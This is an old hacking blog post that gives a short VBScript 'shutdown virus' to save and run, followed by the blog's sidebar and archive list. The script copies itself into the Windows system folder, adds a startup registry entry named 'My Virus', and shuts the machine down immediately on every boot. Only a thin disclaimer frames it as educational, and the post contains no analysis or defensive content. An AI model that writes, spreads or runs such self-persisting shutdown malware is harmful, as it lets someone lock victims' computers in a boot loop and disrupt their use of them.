This is a VBScript code which will shutdown your PC on startup...
You can change the shutdown time...
This script is meant solely for educational purpose and i shall not be held responsible for any misuse....
Save the code in a file with extension as .vbe or .vbs...
Run it and NJoY....
=====================================================
Dim fso, wsh
Set wsh = WScript.CreateObject("WScript.Shell")
Set fso = WScript.CreateObject("Scripting.FileSystemObject")
If Not fso.FileExists(fso.GetSpecialFolder(1) & "\" & WScript.ScriptName) Then
fso.CopyFile WScript.ScriptFullName, fso.GetSpecialFolder(1) & "\"
End If
wsh.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\My Virus",_
fso.GetSpecialFolder(1) & "\" & WScript.ScriptName
wsh.Run "shutdown -s -t 0"
=====================================================
change the line below for different shutdown timings in secs...
wsh.Run "shutdown -s -t 10"
To abort shutdown type "shutdown -a" in Run...
This entry was posted
at 1:02 PM
and is filed under
Hacking
. You can follow any responses to this entry through the
comments feed
.
Reverse Engineering :Subscribe Now
Zts - ZTS
DISCLAIMER
This Blog is ONLY for educational purposes,
and any such codes/snippets provided are to be executed on
your sole discretion. The author is not responsible for the codes.
and any such codes/snippets provided are to be executed on
your sole discretion. The author is not responsible for the codes.
Categories
- Amazing Links (2)
- Ebooks (2)
- Games (1)
- Hacking (49)
- Hardware (2)
- Networks-programs (12)
- virus (4)
- Web Info (4)
- Xp-Tricks (19)
Archives
-
▼
2008
(46)
-
▼
August
(30)
- Back up the registry
- Hacking on Xp
- Hacking
- All abt Linux
- Firewall Protection
- Firefox Speed Tweaks
- Evolution of Computer Viruses
- Computer Acronyms
- Beep Code Manual
- Bandwidth xplained
- Movie Tags
- Brief Concept Of Internet
- Great Google Secrets
- 10 reasons why PCs crash U must Know
- Show Hidden Files
- How To Convert File System, fat - fat32 to ntfs
- Speed up u r internet connection
- Speed up u r internet connection
- Create U r Own Folder Lock
- Make Xp Genuine
- Amazing Links
- Amazing Links
- Shutdown Virus
- Xp ShrtCut Keys
- Trace Any IP Address In The World!
- BIOS Update Procedure
- Block Adservers
- Bit Torrent Tutorials
- Cd rom open virus
- Virus
-
▼
August
(30)
Subscribe Now
Page Hits
Provided by website design company directory. |